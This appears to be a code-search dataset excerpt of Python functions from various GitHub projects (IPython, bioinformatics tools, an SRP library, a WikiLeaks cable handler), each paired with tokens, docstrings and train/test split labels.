https://github.com/cloud9ers/gurumate/blob/075dc74d1ee62a8c6b7a8bf2b271364f01629d1e/environment/lib/python2.7/site-packages/IPython/parallel/controller/sqlitedb.py#L333-L339
def get_record(self, msg_id): """Get a specific Task Record, by msg_id.""" cursor = self._db.execute("""SELECT * FROM %s WHERE msg_id==?"""%self.table, (msg_id,)) line = cursor.fetchone() if line is None: raise KeyError("No such msg: %r"%msg_id) return self._list_to_dict(line)
[ "def", "get_record", "(", "self", ",", "msg_id", ")", ":", "cursor", "=", "self", ".", "_db", ".", "execute", "(", "\"\"\"SELECT * FROM %s WHERE msg_id==?\"\"\"", "%", "self", ".", "table", ",", "(", "msg_id", ",", ")", ")", "line", "=", "cursor", ".", "fetchone", "(", ")", "if", "line", "is", "None", ":", "raise", "KeyError", "(", "\"No such msg: %r\"", "%", "msg_id", ")", "return", "self", ".", "_list_to_dict", "(", "line", ")" ]
Get a specific Task Record, by msg_id.
[ "Get", "a", "specific", "Task", "Record", "by", "msg_id", "." ]
python
test
46.142857
Nekroze/partpy
examples/contacts.py
https://github.com/Nekroze/partpy/blob/dbb7d2fb285464fc43d85bc31f5af46192d301f6/examples/contacts.py#L50-L71
def parse_contact(self): """Parse a top level contact expression, these consist of a name expression a special char and an email expression. The characters found in a name and email expression are returned. """ self.parse_whitespace() name = self.parse_name() # parse a name expression and get the string. if not name: # No name was found so shout it out. raise PartpyError(self, 'Expecting a name') self.parse_whitespace() # allow name and email to be delimited by either a ':' or '-' if not self.match_any_char(':-'): raise PartpyError(self, 'Expecting : or -') self.eat_length(1) self.parse_whitespace() email = self.parse_email() # parse an email and store its string. if not email: raise PartpyError(self, 'Expecting an email address') return (name, email)
[ "def", "parse_contact", "(", "self", ")", ":", "self", ".", "parse_whitespace", "(", ")", "name", "=", "self", ".", "parse_name", "(", ")", "# parse a name expression and get the string.", "if", "not", "name", ":", "# No name was found so shout it out.", "raise", "PartpyError", "(", "self", ",", "'Expecting a name'", ")", "self", ".", "parse_whitespace", "(", ")", "# allow name and email to be delimited by either a ':' or '-'", "if", "not", "self", ".", "match_any_char", "(", "':-'", ")", ":", "raise", "PartpyError", "(", "self", ",", "'Expecting : or -'", ")", "self", ".", "eat_length", "(", "1", ")", "self", ".", "parse_whitespace", "(", ")", "email", "=", "self", ".", "parse_email", "(", ")", "# parse an email and store its string.", "if", "not", "email", ":", "raise", "PartpyError", "(", "self", ",", "'Expecting an email address'", ")", "return", "(", "name", ",", "email", ")" ]
Parse a top level contact expression, these consist of a name expression a special char and an email expression. The characters found in a name and email expression are returned.
[ "Parse", "a", "top", "level", "contact", "expression", "these", "consist", "of", "a", "name", "expression", "a", "special", "char", "and", "an", "email", "expression", "." ]
python
train
41
mpg-age-bioinformatics/AGEpy
AGEpy/kegg.py
https://github.com/mpg-age-bioinformatics/AGEpy/blob/887808a7a2c1504f39ce8d8cb36c15c1721cd29f/AGEpy/kegg.py#L83-L105
def ensembl_to_kegg(organism,kegg_db): """ Looks up KEGG mappings of KEGG ids to ensembl ids :param organism: an organisms as listed in organismsKEGG() :param kegg_db: a matching KEGG db as reported in databasesKEGG :returns: a Pandas dataframe of with 'KEGGid' and 'ENSid'. """ print("KEGG API: http://rest.genome.jp/link/"+kegg_db+"/"+organism) sys.stdout.flush() kegg_ens=urlopen("http://rest.genome.jp/link/"+kegg_db+"/"+organism).read() kegg_ens=kegg_ens.split("\n") final=[] for i in kegg_ens: final.append(i.split("\t")) df=pd.DataFrame(final[0:len(final)-1])[[0,1]] ens_id=pd.DataFrame(df[1].str.split(":").tolist())[1] df=pd.concat([df,ens_id],axis=1) df.columns=['KEGGid','ensDB','ENSid'] df=df[['KEGGid','ENSid']] return df
[ "def", "ensembl_to_kegg", "(", "organism", ",", "kegg_db", ")", ":", "print", "(", "\"KEGG API: http://rest.genome.jp/link/\"", "+", "kegg_db", "+", "\"/\"", "+", "organism", ")", "sys", ".", "stdout", ".", "flush", "(", ")", "kegg_ens", "=", "urlopen", "(", "\"http://rest.genome.jp/link/\"", "+", "kegg_db", "+", "\"/\"", "+", "organism", ")", ".", "read", "(", ")", "kegg_ens", "=", "kegg_ens", ".", "split", "(", "\"\\n\"", ")", "final", "=", "[", "]", "for", "i", "in", "kegg_ens", ":", "final", ".", "append", "(", "i", ".", "split", "(", "\"\\t\"", ")", ")", "df", "=", "pd", ".", "DataFrame", "(", "final", "[", "0", ":", "len", "(", "final", ")", "-", "1", "]", ")", "[", "[", "0", ",", "1", "]", "]", "ens_id", "=", "pd", ".", "DataFrame", "(", "df", "[", "1", "]", ".", "str", ".", "split", "(", "\":\"", ")", ".", "tolist", "(", ")", ")", "[", "1", "]", "df", "=", "pd", ".", "concat", "(", "[", "df", ",", "ens_id", "]", ",", "axis", "=", "1", ")", "df", ".", "columns", "=", "[", "'KEGGid'", ",", "'ensDB'", ",", "'ENSid'", "]", "df", "=", "df", "[", "[", "'KEGGid'", ",", "'ENSid'", "]", "]", "return", "df" ]
Looks up KEGG mappings of KEGG ids to ensembl ids :param organism: an organisms as listed in organismsKEGG() :param kegg_db: a matching KEGG db as reported in databasesKEGG :returns: a Pandas dataframe of with 'KEGGid' and 'ENSid'.
[ "Looks", "up", "KEGG", "mappings", "of", "KEGG", "ids", "to", "ensembl", "ids" ]
python
train
34.565217
tommyod/streprogen
streprogen/modeling.py
https://github.com/tommyod/streprogen/blob/21b903618e8b2d398bceb394d18d7c74ca984def/streprogen/modeling.py#L65-L91
def generate_one(self): """Generate a single element. Returns ------- element An element from the domain. Examples ------- >>> generator = RepellentGenerator(['a', 'b']) >>> gen_item = generator.generate_one() >>> gen_item in ['a', 'b'] True """ # Get the weights for all items in the domain weights = [self.probability_func(self.generated[element]) for element in self.domain] # Sample from the domain using the weights element = random.choices(self.domain, weights=weights)[0] # Update the generated values and return self.generated[element] += 1 return element
[ "def", "generate_one", "(", "self", ")", ":", "# Get the weights for all items in the domain", "weights", "=", "[", "self", ".", "probability_func", "(", "self", ".", "generated", "[", "element", "]", ")", "for", "element", "in", "self", ".", "domain", "]", "# Sample from the domain using the weights", "element", "=", "random", ".", "choices", "(", "self", ".", "domain", ",", "weights", "=", "weights", ")", "[", "0", "]", "# Update the generated values and return", "self", ".", "generated", "[", "element", "]", "+=", "1", "return", "element" ]
Generate a single element. Returns ------- element An element from the domain. Examples ------- >>> generator = RepellentGenerator(['a', 'b']) >>> gen_item = generator.generate_one() >>> gen_item in ['a', 'b'] True
[ "Generate", "a", "single", "element", ".", "Returns", "-------", "element", "An", "element", "from", "the", "domain", ".", "Examples", "-------", ">>>", "generator", "=", "RepellentGenerator", "(", "[", "a", "b", "]", ")", ">>>", "gen_item", "=", "generator", ".", "generate_one", "()", ">>>", "gen_item", "in", "[", "a", "b", "]", "True" ]
python
train
27.037037
learningequality/ricecooker
ricecooker/utils/metadata_provider.py
https://github.com/learningequality/ricecooker/blob/2f0385282500cb77ef2894646c6f9ce11bd7a853/ricecooker/utils/metadata_provider.py#L255-L268
def get_channel_info(self): """ Returns the first data row from Channel.csv """ csv_filename = get_metadata_file_path(channeldir=self.channeldir, filename=self.channelinfo) csv_lines = _read_csv_lines(csv_filename) dict_reader = csv.DictReader(csv_lines) channel_csvs_list = list(dict_reader) channel_csv = channel_csvs_list[0] if len(channel_csvs_list) > 1: raise ValueError('Found multiple channel rows in ' + self.channelinfo) channel_cleaned = _clean_dict(channel_csv) channel_info = self._map_channel_row_to_dict(channel_cleaned) return channel_info
[ "def", "get_channel_info", "(", "self", ")", ":", "csv_filename", "=", "get_metadata_file_path", "(", "channeldir", "=", "self", ".", "channeldir", ",", "filename", "=", "self", ".", "channelinfo", ")", "csv_lines", "=", "_read_csv_lines", "(", "csv_filename", ")", "dict_reader", "=", "csv", ".", "DictReader", "(", "csv_lines", ")", "channel_csvs_list", "=", "list", "(", "dict_reader", ")", "channel_csv", "=", "channel_csvs_list", "[", "0", "]", "if", "len", "(", "channel_csvs_list", ")", ">", "1", ":", "raise", "ValueError", "(", "'Found multiple channel rows in '", "+", "self", ".", "channelinfo", ")", "channel_cleaned", "=", "_clean_dict", "(", "channel_csv", ")", "channel_info", "=", "self", ".", "_map_channel_row_to_dict", "(", "channel_cleaned", ")", "return", "channel_info" ]
Returns the first data row from Channel.csv
[ "Returns", "the", "first", "data", "row", "from", "Channel", ".", "csv" ]
python
train
46.428571
mozilla/socorrolib
socorrolib/lib/task_manager.py
https://github.com/mozilla/socorrolib/blob/4ec08c6a4ee2c8a69150268afdd324f5f22b90c8/socorrolib/lib/task_manager.py#L27-L53
def respond_to_SIGTERM(signal_number, frame, target=None): """ these classes are instrumented to respond to a KeyboardInterrupt by cleanly shutting down. This function, when given as a handler to for a SIGTERM event, will make the program respond to a SIGTERM as neatly as it responds to ^C. This function is used in registering a signal handler from the signal module. It should be registered for any signal for which the desired behavior is to kill the application: signal.signal(signal.SIGTERM, respondToSIGTERM) signal.signal(signal.SIGHUP, respondToSIGTERM) parameters: signal_number - unused in this function but required by the api. frame - unused in this function but required by the api. target - an instance of a class that has a member called 'task_manager' that is a derivative of the TaskManager class below. """ if target: target.config.logger.info('detected SIGTERM') # by setting the quit flag to true, any calls to the 'quit_check' # method that is so liberally passed around in this framework will # result in raising the quit exception. The current quit exception # is KeyboardInterrupt target.task_manager.quit = True else: raise KeyboardInterrupt
[ "def", "respond_to_SIGTERM", "(", "signal_number", ",", "frame", ",", "target", "=", "None", ")", ":", "if", "target", ":", "target", ".", "config", ".", "logger", ".", "info", "(", "'detected SIGTERM'", ")", "# by setting the quit flag to true, any calls to the 'quit_check'", "# method that is so liberally passed around in this framework will", "# result in raising the quit exception. The current quit exception", "# is KeyboardInterrupt", "target", ".", "task_manager", ".", "quit", "=", "True", "else", ":", "raise", "KeyboardInterrupt" ]
these classes are instrumented to respond to a KeyboardInterrupt by cleanly shutting down. This function, when given as a handler to for a SIGTERM event, will make the program respond to a SIGTERM as neatly as it responds to ^C. This function is used in registering a signal handler from the signal module. It should be registered for any signal for which the desired behavior is to kill the application: signal.signal(signal.SIGTERM, respondToSIGTERM) signal.signal(signal.SIGHUP, respondToSIGTERM) parameters: signal_number - unused in this function but required by the api. frame - unused in this function but required by the api. target - an instance of a class that has a member called 'task_manager' that is a derivative of the TaskManager class below.
[ "these", "classes", "are", "instrumented", "to", "respond", "to", "a", "KeyboardInterrupt", "by", "cleanly", "shutting", "down", ".", "This", "function", "when", "given", "as", "a", "handler", "to", "for", "a", "SIGTERM", "event", "will", "make", "the", "program", "respond", "to", "a", "SIGTERM", "as", "neatly", "as", "it", "responds", "to", "^C", "." ]
python
train
48.259259
ondryaso/pi-rc522
pirc522/util.py
https://github.com/ondryaso/pi-rc522/blob/9d9103e9701c105ba2348155e91f21ef338c4bd3/pirc522/util.py#L53-L67
def deauth(self): """ Resets authentication info. Calls stop_crypto() if RFID is in auth state """ self.method = None self.key = None self.last_auth = None if self.debug: print("Changing auth key and method to None") if self.rfid.authed: self.rfid.stop_crypto() if self.debug: print("Stopping crypto1")
[ "def", "deauth", "(", "self", ")", ":", "self", ".", "method", "=", "None", "self", ".", "key", "=", "None", "self", ".", "last_auth", "=", "None", "if", "self", ".", "debug", ":", "print", "(", "\"Changing auth key and method to None\"", ")", "if", "self", ".", "rfid", ".", "authed", ":", "self", ".", "rfid", ".", "stop_crypto", "(", ")", "if", "self", ".", "debug", ":", "print", "(", "\"Stopping crypto1\"", ")" ]
Resets authentication info. Calls stop_crypto() if RFID is in auth state
[ "Resets", "authentication", "info", ".", "Calls", "stop_crypto", "()", "if", "RFID", "is", "in", "auth", "state" ]
python
train
27.066667
spyder-ide/spyder
spyder/utils/codeanalysis.py
https://github.com/spyder-ide/spyder/blob/f76836ce1b924bcc4efd3f74f2960d26a4e528e0/spyder/utils/codeanalysis.py#L96-L113
def get_checker_executable(name): """Return checker executable in the form of a list of arguments for subprocess.Popen""" if programs.is_program_installed(name): # Checker is properly installed return [name] else: path1 = programs.python_script_exists(package=None, module=name+'_script') path2 = programs.python_script_exists(package=None, module=name) if path1 is not None: # checker_script.py is available # Checker script is available but has not been installed # (this may work with pyflakes) return [sys.executable, path1] elif path2 is not None: # checker.py is available # Checker package is available but its script has not been # installed (this works with pycodestyle but not with pyflakes) return [sys.executable, path2]
[ "def", "get_checker_executable", "(", "name", ")", ":", "if", "programs", ".", "is_program_installed", "(", "name", ")", ":", "# Checker is properly installed\r", "return", "[", "name", "]", "else", ":", "path1", "=", "programs", ".", "python_script_exists", "(", "package", "=", "None", ",", "module", "=", "name", "+", "'_script'", ")", "path2", "=", "programs", ".", "python_script_exists", "(", "package", "=", "None", ",", "module", "=", "name", ")", "if", "path1", "is", "not", "None", ":", "# checker_script.py is available\r", "# Checker script is available but has not been installed\r", "# (this may work with pyflakes)\r", "return", "[", "sys", ".", "executable", ",", "path1", "]", "elif", "path2", "is", "not", "None", ":", "# checker.py is available\r", "# Checker package is available but its script has not been\r", "# installed (this works with pycodestyle but not with pyflakes)\r", "return", "[", "sys", ".", "executable", ",", "path2", "]" ]
Return checker executable in the form of a list of arguments for subprocess.Popen
[ "Return", "checker", "executable", "in", "the", "form", "of", "a", "list", "of", "arguments", "for", "subprocess", ".", "Popen" ]
python
train
50.888889
idlesign/srptools
srptools/context.py
https://github.com/idlesign/srptools/blob/eb08a27137d3216e41d63bbeafbac79f43881a6a/srptools/context.py#L129-L141
def get_client_premaster_secret(self, password_hash, server_public, client_private, common_secret): """S = (B - (k * g^x)) ^ (a + (u * x)) % N :param int server_public: :param int password_hash: :param int client_private: :param int common_secret: :rtype: int """ password_verifier = self.get_common_password_verifier(password_hash) return pow( (server_public - (self._mult * password_verifier)), (client_private + (common_secret * password_hash)), self._prime)
[ "def", "get_client_premaster_secret", "(", "self", ",", "password_hash", ",", "server_public", ",", "client_private", ",", "common_secret", ")", ":", "password_verifier", "=", "self", ".", "get_common_password_verifier", "(", "password_hash", ")", "return", "pow", "(", "(", "server_public", "-", "(", "self", ".", "_mult", "*", "password_verifier", ")", ")", ",", "(", "client_private", "+", "(", "common_secret", "*", "password_hash", ")", ")", ",", "self", ".", "_prime", ")" ]
S = (B - (k * g^x)) ^ (a + (u * x)) % N :param int server_public: :param int password_hash: :param int client_private: :param int common_secret: :rtype: int
[ "S", "=", "(", "B", "-", "(", "k", "*", "g^x", "))", "^", "(", "a", "+", "(", "u", "*", "x", "))", "%", "N" ]
python
train
42
rcsb/mmtf-python
mmtf/converters/converters.py
https://github.com/rcsb/mmtf-python/blob/899bb877ca1b32a9396803d38c5bf38a2520754e/mmtf/converters/converters.py#L34-L44
def decode_chain_list(in_bytes): """Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN :param in_bytes: the input bytes :return the decoded list of strings""" tot_strings = len(in_bytes) // mmtf.utils.constants.CHAIN_LEN out_strings = [] for i in range(tot_strings): out_s = in_bytes[i * mmtf.utils.constants.CHAIN_LEN:i * mmtf.utils.constants.CHAIN_LEN + mmtf.utils.constants.CHAIN_LEN] out_strings.append(out_s.decode("ascii").strip(mmtf.utils.constants.NULL_BYTE)) return out_strings
[ "def", "decode_chain_list", "(", "in_bytes", ")", ":", "tot_strings", "=", "len", "(", "in_bytes", ")", "//", "mmtf", ".", "utils", ".", "constants", ".", "CHAIN_LEN", "out_strings", "=", "[", "]", "for", "i", "in", "range", "(", "tot_strings", ")", ":", "out_s", "=", "in_bytes", "[", "i", "*", "mmtf", ".", "utils", ".", "constants", ".", "CHAIN_LEN", ":", "i", "*", "mmtf", ".", "utils", ".", "constants", ".", "CHAIN_LEN", "+", "mmtf", ".", "utils", ".", "constants", ".", "CHAIN_LEN", "]", "out_strings", ".", "append", "(", "out_s", ".", "decode", "(", "\"ascii\"", ")", ".", "strip", "(", "mmtf", ".", "utils", ".", "constants", ".", "NULL_BYTE", ")", ")", "return", "out_strings" ]
Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN :param in_bytes: the input bytes :return the decoded list of strings
[ "Convert", "a", "list", "of", "bytes", "to", "a", "list", "of", "strings", ".", "Each", "string", "is", "of", "length", "mmtf", ".", "CHAIN_LEN" ]
python
train
50.545455
mjuenema/python-TSIP
tsip/hlapi.py
https://github.com/mjuenema/python-TSIP/blob/e02b68d05772127ea493cd639b3d5f8fb73df402/tsip/hlapi.py#L136-L160
def unpack(cls, rawpacket): """Instantiate `Packet` from binary string. :param rawpacket: TSIP pkt in binary format. :type rawpacket: String. `rawpacket` must already have framing (DLE...DLE/ETX) removed and byte stuffing reversed. """ structs_ = get_structs_for_rawpacket(rawpacket) for struct_ in structs_: try: return cls(*struct_.unpack(rawpacket)) except struct.error: raise # Try next one. pass # Packet ID 0xff is a pseudo-packet representing # packets unknown to `python-TSIP` in their raw format. # return cls(0xff, rawpacket)
[ "def", "unpack", "(", "cls", ",", "rawpacket", ")", ":", "structs_", "=", "get_structs_for_rawpacket", "(", "rawpacket", ")", "for", "struct_", "in", "structs_", ":", "try", ":", "return", "cls", "(", "*", "struct_", ".", "unpack", "(", "rawpacket", ")", ")", "except", "struct", ".", "error", ":", "raise", "# Try next one.", "pass", "# Packet ID 0xff is a pseudo-packet representing", "# packets unknown to `python-TSIP` in their raw format.", "#", "return", "cls", "(", "0xff", ",", "rawpacket", ")" ]
Instantiate `Packet` from binary string. :param rawpacket: TSIP pkt in binary format. :type rawpacket: String. `rawpacket` must already have framing (DLE...DLE/ETX) removed and byte stuffing reversed.
[ "Instantiate", "Packet", "from", "binary", "string", "." ]
python
train
28.52
klahnakoski/pyLibrary
jx_base/language.py
https://github.com/klahnakoski/pyLibrary/blob/fa2dcbc48fda8d26999baef400e9a98149e0b982/jx_base/language.py#L125-L134
def is_op(call, op): """ :param call: The specific operator instance (a method call) :param op: The the operator we are testing against :return: isinstance(call, op), but faster """ try: return call.id == op.id except Exception as e: return False
[ "def", "is_op", "(", "call", ",", "op", ")", ":", "try", ":", "return", "call", ".", "id", "==", "op", ".", "id", "except", "Exception", "as", "e", ":", "return", "False" ]
:param call: The specific operator instance (a method call) :param op: The the operator we are testing against :return: isinstance(call, op), but faster
[ ":", "param", "call", ":", "The", "specific", "operator", "instance", "(", "a", "method", "call", ")", ":", "param", "op", ":", "The", "the", "operator", "we", "are", "testing", "against", ":", "return", ":", "isinstance", "(", "call", "op", ")", "but", "faster" ]
python
train
28.1
LISE-B26/pylabcontrol
build/lib/pylabcontrol/src/gui/qt_b26_load_dialog.py
https://github.com/LISE-B26/pylabcontrol/blob/67482e5157fcd1c40705e5c2cacfb93564703ed0/build/lib/pylabcontrol/src/gui/qt_b26_load_dialog.py#L247-L295
def add_script_sequence(self): """ creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree self.tree_loaded """ def empty_tree(tree_model): # COMMENT_ME def add_children_to_list(item, somelist): if item.hasChildren(): for rownum in range(0, item.rowCount()): somelist.append(str(item.child(rownum, 0).text())) output_list = [] root = tree_model.invisibleRootItem() add_children_to_list(root, output_list) tree_model.clear() return output_list name = str(self.txt_script_sequence_name.text()) new_script_list = empty_tree(self.tree_script_sequence_model) new_script_dict = {} for script in new_script_list: if script in self.elements_old: new_script_dict.update({script: self.elements_old[script]}) elif script in self.elements_from_file: new_script_dict.update({script: self.elements_from_file[script]}) new_script_parameter_dict = {} for index, script in enumerate(new_script_list): new_script_parameter_dict.update({script: index}) # QtGui.QTextEdit.toPlainText() # get the module of the current dialogue package = get_python_package(inspect.getmodule(self).__file__) assert package is not None # check that we actually find a module # class_name = Script.set_up_dynamic_script(factory_scripts, new_script_parameter_list, self.cmb_looping_variable.currentText() == 'Parameter Sweep') new_script_dict = {name: {'class': 'ScriptIterator', 'package': package, 'scripts': new_script_dict, 'info': str(self.txt_info.toPlainText()), 'settings': {'script_order': new_script_parameter_dict, 'iterator_type': str(self.cmb_looping_variable.currentText())}}} self.selected_element_name = name self.fill_tree(self.tree_loaded, new_script_dict) self.elements_from_file.update(new_script_dict)
[ "def", "add_script_sequence", "(", "self", ")", ":", "def", "empty_tree", "(", "tree_model", ")", ":", "# COMMENT_ME", "def", "add_children_to_list", "(", "item", ",", "somelist", ")", ":", "if", "item", ".", "hasChildren", "(", ")", ":", "for", "rownum", "in", "range", "(", "0", ",", "item", ".", "rowCount", "(", ")", ")", ":", "somelist", ".", "append", "(", "str", "(", "item", ".", "child", "(", "rownum", ",", "0", ")", ".", "text", "(", ")", ")", ")", "output_list", "=", "[", "]", "root", "=", "tree_model", ".", "invisibleRootItem", "(", ")", "add_children_to_list", "(", "root", ",", "output_list", ")", "tree_model", ".", "clear", "(", ")", "return", "output_list", "name", "=", "str", "(", "self", ".", "txt_script_sequence_name", ".", "text", "(", ")", ")", "new_script_list", "=", "empty_tree", "(", "self", ".", "tree_script_sequence_model", ")", "new_script_dict", "=", "{", "}", "for", "script", "in", "new_script_list", ":", "if", "script", "in", "self", ".", "elements_old", ":", "new_script_dict", ".", "update", "(", "{", "script", ":", "self", ".", "elements_old", "[", "script", "]", "}", ")", "elif", "script", "in", "self", ".", "elements_from_file", ":", "new_script_dict", ".", "update", "(", "{", "script", ":", "self", ".", "elements_from_file", "[", "script", "]", "}", ")", "new_script_parameter_dict", "=", "{", "}", "for", "index", ",", "script", "in", "enumerate", "(", "new_script_list", ")", ":", "new_script_parameter_dict", ".", "update", "(", "{", "script", ":", "index", "}", ")", "# QtGui.QTextEdit.toPlainText()", "# get the module of the current dialogue", "package", "=", "get_python_package", "(", "inspect", ".", "getmodule", "(", "self", ")", ".", "__file__", ")", "assert", "package", "is", "not", "None", "# check that we actually find a module", "# class_name = Script.set_up_dynamic_script(factory_scripts, new_script_parameter_list, self.cmb_looping_variable.currentText() == 'Parameter Sweep')", "new_script_dict", "=", "{", "name", ":", "{", "'class'", ":", "'ScriptIterator'", ",", "'package'", ":", "package", ",", "'scripts'", ":", "new_script_dict", ",", "'info'", ":", "str", "(", "self", ".", "txt_info", ".", "toPlainText", "(", ")", ")", ",", "'settings'", ":", "{", "'script_order'", ":", "new_script_parameter_dict", ",", "'iterator_type'", ":", "str", "(", "self", ".", "cmb_looping_variable", ".", "currentText", "(", ")", ")", "}", "}", "}", "self", ".", "selected_element_name", "=", "name", "self", ".", "fill_tree", "(", "self", ".", "tree_loaded", ",", "new_script_dict", ")", "self", ".", "elements_from_file", ".", "update", "(", "new_script_dict", ")" ]
creates a script sequence based on the script iterator type selected and the selected scripts and sends it to the tree self.tree_loaded
[ "creates", "a", "script", "sequence", "based", "on", "the", "script", "iterator", "type", "selected", "and", "the", "selected", "scripts", "and", "sends", "it", "to", "the", "tree", "self", ".", "tree_loaded" ]
python
train
44.755102
cni/MRS
MRS/api.py
https://github.com/cni/MRS/blob/16098b3cf4830780efd787fee9efa46513850283/MRS/api.py#L708-L727
def est_gaba_conc(self): """ Estimate gaba concentration based on equation adapted from Sanacora 1999, p1045 Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder, F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical $\gamma$-aminobutyric acid levels in depressed patients determined by proton magnetic resonance spectroscopy. Archives of general psychiatry, 56(11), 1043. """ # need gaba_auc and creatine_auc if not hasattr(self, 'gaba_params'): self.fit_gaba() # estimate [GABA] according to equation9 gaba_conc_est = self.gaba_auc / self.creatine_auc * 1.5 * 9.0 self.gaba_conc_est = gaba_conc_est
[ "def", "est_gaba_conc", "(", "self", ")", ":", "# need gaba_auc and creatine_auc", "if", "not", "hasattr", "(", "self", ",", "'gaba_params'", ")", ":", "self", ".", "fit_gaba", "(", ")", "# estimate [GABA] according to equation9", "gaba_conc_est", "=", "self", ".", "gaba_auc", "/", "self", ".", "creatine_auc", "*", "1.5", "*", "9.0", "self", ".", "gaba_conc_est", "=", "gaba_conc_est" ]
Estimate gaba concentration based on equation adapted from Sanacora 1999, p1045 Ref: Sanacora, G., Mason, G. F., Rothman, D. L., Behar, K. L., Hyder, F., Petroff, O. A., ... & Krystal, J. H. (1999). Reduced cortical $\gamma$-aminobutyric acid levels in depressed patients determined by proton magnetic resonance spectroscopy. Archives of general psychiatry, 56(11), 1043.
[ "Estimate", "gaba", "concentration", "based", "on", "equation", "adapted", "from", "Sanacora", "1999", "p1045" ]
python
train
37.25
relekang/python-semantic-release
semantic_release/ci_checks.py
https://github.com/relekang/python-semantic-release/blob/76123f410180599a19e7c48da413880185bbea20/semantic_release/ci_checks.py#L9-L27
def checker(func: Callable) -> Callable: """ A decorator that will convert AssertionErrors into CiVerificationError. :param func: A function that will raise AssertionError :return: The given function wrapped to raise a CiVerificationError on AssertionError """ def func_wrapper(*args, **kwargs): try: func(*args, **kwargs) return True except AssertionError: raise CiVerificationError( 'The verification check for the environment did not pass.' ) return func_wrapper
[ "def", "checker", "(", "func", ":", "Callable", ")", "->", "Callable", ":", "def", "func_wrapper", "(", "*", "args", ",", "*", "*", "kwargs", ")", ":", "try", ":", "func", "(", "*", "args", ",", "*", "*", "kwargs", ")", "return", "True", "except", "AssertionError", ":", "raise", "CiVerificationError", "(", "'The verification check for the environment did not pass.'", ")", "return", "func_wrapper" ]
A decorator that will convert AssertionErrors into CiVerificationError. :param func: A function that will raise AssertionError :return: The given function wrapped to raise a CiVerificationError on AssertionError
[ "A", "decorator", "that", "will", "convert", "AssertionErrors", "into", "CiVerificationError", "." ]
python
train
29.578947
sanger-pathogens/Fastaq
pyfastaq/tasks.py
https://github.com/sanger-pathogens/Fastaq/blob/2c775c846d2491678a9637daa320592e02c26c72/pyfastaq/tasks.py#L568-L577
def sort_by_name(infile, outfile): '''Sorts input sequence file by sort -d -k1,1, writes sorted output file.''' seqs = {} file_to_dict(infile, seqs) #seqs = list(seqs.values()) #seqs.sort() fout = utils.open_file_write(outfile) for name in sorted(seqs): print(seqs[name], file=fout) utils.close(fout)
[ "def", "sort_by_name", "(", "infile", ",", "outfile", ")", ":", "seqs", "=", "{", "}", "file_to_dict", "(", "infile", ",", "seqs", ")", "#seqs = list(seqs.values())", "#seqs.sort()", "fout", "=", "utils", ".", "open_file_write", "(", "outfile", ")", "for", "name", "in", "sorted", "(", "seqs", ")", ":", "print", "(", "seqs", "[", "name", "]", ",", "file", "=", "fout", ")", "utils", ".", "close", "(", "fout", ")" ]
Sorts input sequence file by sort -d -k1,1, writes sorted output file.
[ "Sorts", "input", "sequence", "file", "by", "sort", "-", "d", "-", "k1", "1", "writes", "sorted", "output", "file", "." ]
python
valid
33.1
heuer/cablemap
cablemap.core/cablemap/core/handler.py
https://github.com/heuer/cablemap/blob/42066c8fc2972d237a2c35578e14525aaf705f38/cablemap.core/cablemap/core/handler.py#L234-L295
def handle_cable(cable, handler, standalone=True): """\ Emits event from the provided `cable` to the handler. `cable` A cable object. `handler` A ICableHandler instance. `standalone` Indicates if a `start` and `end` event should be issued (default: ``True``). If `standalone` is set to ``False``, no ``handler.start()`` and ``handler.end()`` event will be issued. """ def datetime(dt): date, time = dt.split(u' ') if len(time) == 5: time += u':00' time += u'Z' return u'T'.join([date, time]) if standalone: handler.start() handler.start_cable(cable.reference_id, cable.canonical_id) for iri in cable.wl_uris: handler.handle_wikileaks_iri(iri) handler.handle_creation_datetime(datetime(cable.created)) if cable.released: handler.handle_release_date(cable.released[:10]) if cable.nondisclosure_deadline: handler.handle_nondisclosure_deadline(cable.nondisclosure_deadline) if cable.transmission_id: handler.handle_transmission_id(cable.transmission_id) if cable.subject: handler.handle_subject(cable.subject) if cable.summary: handler.handle_summary(cable.summary) if cable.comment: handler.handle_comment(cable.comment) handler.handle_header(cable.header) handler.handle_content(cable.content) handler.handle_origin(cable.origin) handler.handle_classification(cable.classification) handler.handle_partial(cable.partial) for cat in cable.classification_categories: handler.handle_classification_category(cat) for classificationist in cable.classificationists: handler.handle_classificationist(classificationist) for signer in cable.signers: handler.handle_signer(signer) for tag in cable.tags: handler.handle_tag(tag) for iri in cable.media_uris: handler.handle_media_iri(iri) for rec in cable.recipients: handler.handle_recipient(rec) for rec in cable.info_recipients: handler.handle_info_recipient(rec) for ref in cable.references: handler.handle_reference(ref) handler.end_cable() if standalone: handler.end()
[ "def", "handle_cable", "(", "cable", ",", "handler", ",", "standalone", "=", "True", ")", ":", "def", "datetime", "(", "dt", ")", ":", "date", ",", "time", "=", "dt", ".", "split", "(", "u' '", ")", "if", "len", "(", "time", ")", "==", "5", ":", "time", "+=", "u':00'", "time", "+=", "u'Z'", "return", "u'T'", ".", "join", "(", "[", "date", ",", "time", "]", ")", "if", "standalone", ":", "handler", ".", "start", "(", ")", "handler", ".", "start_cable", "(", "cable", ".", "reference_id", ",", "cable", ".", "canonical_id", ")", "for", "iri", "in", "cable", ".", "wl_uris", ":", "handler", ".", "handle_wikileaks_iri", "(", "iri", ")", "handler", ".", "handle_creation_datetime", "(", "datetime", "(", "cable", ".", "created", ")", ")", "if", "cable", ".", "released", ":", "handler", ".", "handle_release_date", "(", "cable", ".", "released", "[", ":", "10", "]", ")", "if", "cable", ".", "nondisclosure_deadline", ":", "handler", ".", "handle_nondisclosure_deadline", "(", "cable", ".", "nondisclosure_deadline", ")", "if", "cable", ".", "transmission_id", ":", "handler", ".", "handle_transmission_id", "(", "cable", ".", "transmission_id", ")", "if", "cable", ".", "subject", ":", "handler", ".", "handle_subject", "(", "cable", ".", "subject", ")", "if", "cable", ".", "summary", ":", "handler", ".", "handle_summary", "(", "cable", ".", "summary", ")", "if", "cable", ".", "comment", ":", "handler", ".", "handle_comment", "(", "cable", ".", "comment", ")", "handler", ".", "handle_header", "(", "cable", ".", "header", ")", "handler", ".", "handle_content", "(", "cable", ".", "content", ")", "handler", ".", "handle_origin", "(", "cable", ".", "origin", ")", "handler", ".", "handle_classification", "(", "cable", ".", "classification", ")", "handler", ".", "handle_partial", "(", "cable", ".", "partial", ")", "for", "cat", "in", "cable", ".", 